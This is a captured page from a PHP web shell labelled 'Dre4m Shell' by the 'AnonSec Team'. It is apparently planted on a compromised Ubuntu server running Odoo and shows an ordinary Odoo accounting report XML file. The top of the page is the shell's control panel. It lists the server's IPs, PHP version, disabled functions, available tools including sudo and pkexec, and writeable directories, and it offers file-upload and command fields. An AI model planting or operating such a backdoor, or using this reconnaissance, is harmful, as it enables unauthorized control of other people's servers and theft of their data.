Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 18.223.209.231
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/odoo/addons/account/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /opt/odoo/addons/account/views/account_report.xml
<?xml version="1.0" encoding="utf-8"?>
<odoo>
    <data>
        <!-- QWeb Reports -->
        <report 
            id="account_invoices"
            model="account.invoice"
            string="Invoices"
            report_type="qweb-pdf"
            name="account.report_invoice"
            file="account.report_invoice"
            attachment_use="True"
            attachment="(object.state in ('open','paid')) and ('INV'+(object.number or '').replace('/','')+'.pdf')"
        />

        <report 
            id="account_invoice_action_report_duplicate"
            model="account.invoice"
            string="Duplicates"
            report_type="qweb-pdf"
            name="account.account_invoice_report_duplicate_main"
            file="account.report_invoice_duplicate"
            attachment_use="False"
        />

        <report 
            id="action_report_print_overdue"
            model="res.partner"
            report_type="qweb-pdf"
            string="Due Payments"
            name="account.report_overdue"
            file="account.report_overdue"
            />

        <report 
            id="action_report_general_ledger"
            model="account.report.general.ledger"
            string="General Ledger"
            report_type="qweb-pdf"
            name="account.report_generalledger"
            file="account.report_generalledger"
            />

        <report 
            id="action_report_trial_balance"
            model="account.balance.report"
            string="Trial Balance"
            report_type="qweb-pdf"
            name="account.report_trialbalance"
            file="account.report_trialbalance"
            />

        <report 
            id="action_report_financial"
            model="account.financial.report"
            string="Financial report"
            report_type="qweb-pdf"
            name="account.report_financial"
            file="account.report_financial"
            />

        <report
            id="action_report_aged_partner_balance"
            model="res.partner"
            string="Aged Partner Balance"
            menu="False"
            report_type="qweb-pdf"
            name="account.report_agedpartnerbalance"
            file="account.report_agedpartnerbalance"
        />

        <report 
            id="action_report_journal"
            model="account.report.journal"
            string="Sale/Purchase Journal"
            report_type="qweb-pdf"
            name="account.report_journal"
            file="account.report_journal"
            />

        <report 
            id="action_report_partnerledger"
            model="account.report_partnerledger"
            string="Partner Ledger"
            report_type="qweb-pdf"
            name="account.report_partnerledger"
            file="account.report_partnerledger"
            />

    </data>
</odoo>

Anon7 - 2022
AnonSec Team